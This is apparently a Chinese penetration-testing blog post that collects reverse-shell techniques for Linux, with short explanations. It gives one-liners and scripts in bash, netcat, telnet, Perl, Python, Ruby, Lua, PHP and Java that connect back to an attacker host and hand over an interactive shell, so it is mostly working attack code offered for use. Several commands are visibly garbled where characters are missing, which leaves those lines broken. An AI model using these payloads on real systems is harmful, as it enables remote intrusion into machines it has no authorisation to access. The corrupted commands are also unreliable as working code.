linux 渗透 反弹shell,反弹shell的n种姿势

天天被ven师傅吐槽不会日站，然后又看着乐师傅日站，感觉自己好他妈菜，也是时候补一波渗透测试里的一些东西了,虽然我也知道是炒冷饭,但是还是要持续更新，收录一些反弹shell的常规套路和奇淫巧技。当然知其然知其所以然，也会有一些对于相关命令的解析，方便每个渗透测试工作者可以很好的利用，而不是当成exp一样去打

bash

在各种各样的文章里最最常见的一种，但是需要注意的是，往往在一些渗透测试中并不适用，具体原因涉及到linux发行版之间的差异。(ubuntu 不能用bash 反弹233)

1

bash -i >& /dev/tcp/x.x.x.x/port 0&>1

bash 不解释

-i 代表交互运行bash

> 重定向到 /dev/tcp/x.x.x.x/port

& 后台运行,如果不加就会造成服务器端只发送一个tcp连接，然后什么都没了

/dev/tcp/x.x.x.x/port 找不到此文件的哈，意为调用socket,建立socket连接

标准输入

1 标准输出

0>&1 标准输入重定向到标准输出，实现你与反弹出来的shell的交互

2

exec 5<>/dev/tcp/x.x.x.x/9999

cat &5 >&5; done

第一条命令 建立与x.x.x.x:9999的tcp连接，并将标准输入输出作为device 5的标准输入输出

第二条cat

while read line; do $line 2>&5 >&5 一旦获取到命令便运行 然后将标准输入输出以及标准错误输出到device5中

3

exec 0&0 2>&0

0/dev/tcp/attackerip/4444; sh &196 2>&196

/bin/bash -i > /dev/tcp/attackerip/8080 0&1

notice

关闭设备 用 exec [num]>&-

nc反弹

1

出现第二多的233,但是很容易遇到服务器没装netcat或者装了但是webshell不具有权限，又或者默认的发行版的netcat不带-e参数

nc -e /bin/bash x.x.x.x port

在netcat 参数缺失的时候还有以下三种解决方案

2

rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f

rm /tmp/f; 不解释

mkfifo /tmp/f; 在tmp目录下写fifo文件f

/bin/sh -i 2>&1 将/bin/sh 的标准错误重定向到标准输出

nc x.x.x.x 2333 >/tmp/f 将nc监听到的输入 输入到fifo

notice

应该是先获得输入和输出然后将运行结果通过管道到nc客户端

3

nc x.x.x.x 9999|/bin/bash|nc x.x.x.x 8888

这个就比较简单，从9999端口获取到命令，bash 运行后 将结果返回 8888

telnet

telnet x.x.x.x 9999 | /bin/bash | telnet x.x.x.x 8888

监听两个端口分别输入和输出

Perl

perl 没学过但是看见了还是要放

1

perl -e 'use Socket;$i="[x.x.x.x]";$p=[port];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

2

#!/usr/bin/perl -w

use strict;

use Socket;

use IO::Handle;

if($#ARGV+1 != 2){

print "$#ARGV $0 Remote_IP Remote_Port n";

exit 1;

}

my $remote_ip = $ARGV[0];

my $remote_port = $ARGV[1];

my $proto = getprotobyname("tcp");

my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));

my $shell = '/bin/bash -i';

socket(SOCK, AF_INET, SOCK_STREAM, $proto);

STDOUT->autoflush(1);

SOCK->autoflush(1);

connect(SOCK,$pack_addr) or die "can not connect:$!";

open STDIN, "

open STDOUT, ">&SOCK";

open STDERR, ">&SOCK";

print "Enjoy the shell.n";

system($shell);

close SOCK;

exit 0;

Usage:./script.pl [ip] [port]

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

python黑帽子中有更加详细的2333

不过一般来说够用了

Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","9999");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','9999');os.execute('/bin/sh -i &3 2>&3');"

PHP

php -r '$sock=fsockopen("x.x.x.x",9999);exec("/bin/bash -i &3 2>&3");'

Java

public class Revs {

/**

* @param args

* @throws Exception

*/

public static void main(String[] args) throws Exception {

// TODO Auto-generated method stub

Runtime r = Runtime.getRuntime();

String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/9999;cat &5 >&5; done"};

Process p = r.exec(cmd);

p.waitFor();

}

}

总结[2017.7.14更]

基本都是本来就有的资源，慢慢更

bash/nc/telnet 三个都是基于工具原有的功能来实现反弹的

java说白了就是调用了系统函数，可定制性强2333

几个脚本语言，就是调用socket，原理理解一下很快，感觉在反弹上和webshell一样具有很强的定制性